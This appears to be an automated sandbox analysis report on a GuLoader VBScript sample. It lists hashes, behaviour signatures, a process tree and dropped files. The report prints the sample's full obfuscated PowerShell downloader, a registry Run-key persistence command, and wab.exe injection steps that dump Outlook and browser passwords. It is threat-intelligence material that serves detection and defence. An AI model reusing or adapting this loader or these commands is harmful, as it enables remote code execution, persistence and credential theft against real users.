Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 14:59

General

  • Target

    5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs

  • Size

    13KB

  • MD5

    12e0264eaf14daca0cd45da32ea68c80

  • SHA1

    56774e10d374a80549d06406f52514c06634c5e4

  • SHA256

    5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66

  • SHA512

    8d80725c889c722be19dd07bda6c8ed29d2a2d5cd8f353eb5df7f4f998538c7ca8afd08993800c7cdb2772f6b5c51e78399c51e486c19fafa29f963acdc6b66e

  • SSDEEP

    192:6i9I38fdqWxBTsQqkqYK2yud66mT7LdjnPm4oTgWXvA/YJgzyv3tEQpK:1I3IddsMqYK2ndc1jO4cgZ/+GyPtLK

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping 6777.6777.6777.677e
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Windows\system32\PING.EXE
        ping 6777.6777.6777.677e
        3⤵
        • Runs ping.exe
        PID:2348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3488
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
        3⤵
          PID:4208
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3300
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
            4⤵
              PID:4428
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:3044
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1624
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1412
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"
                5⤵
                  PID:5072
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"
                  5⤵
                    PID:856
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk"
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2764
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pqoeos"
                    5⤵
                    • Accesses Microsoft Outlook accounts
                    PID:4532
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zltxokpmsn"
                    5⤵
                      PID:4508
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zltxokpmsn"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3692

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixc22uig.iqd.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\nobtnhuqqxsvaxybxuzgbthktkatecctdk

              Filesize

              4KB

              MD5

              18b6368b183e546a35847ae24b4b2913

              SHA1

              040545f7ac2c987d2a79b5e7f1cf9ab83bd25923

              SHA256

              54c101b6b1241b6a0574a66e5a5b9bddc6c60a4daf7338dba6fe3f65b27382af

              SHA512

              68ba8734016705cd12bf9d7ce41d5c823b2ec6ce9ee1ee7e9da9efcd9c88ef1f1b18148d91ad6a271c7a88d4ca098a99198ca709fcf217f9b1fa18f74c48d698

            • C:\Users\Admin\AppData\Roaming\Droh.Lit

              Filesize

              480KB

              MD5

              1a958060ba3e3de4653959fe2fd1efd5

              SHA1

              c5d3a5646dc5920668f1f61c334c7c7d40c888b5

              SHA256

              268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab

              SHA512

              8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0

            • memory/2764-56-0x0000000000400000-0x0000000000478000-memory.dmp

              Filesize

              480KB

            • memory/2764-54-0x0000000000400000-0x0000000000478000-memory.dmp

              Filesize

              480KB

            • memory/2764-52-0x0000000000400000-0x0000000000478000-memory.dmp

              Filesize

              480KB

            • memory/3044-69-0x0000000020FD0000-0x0000000020FE9000-memory.dmp

              Filesize

              100KB

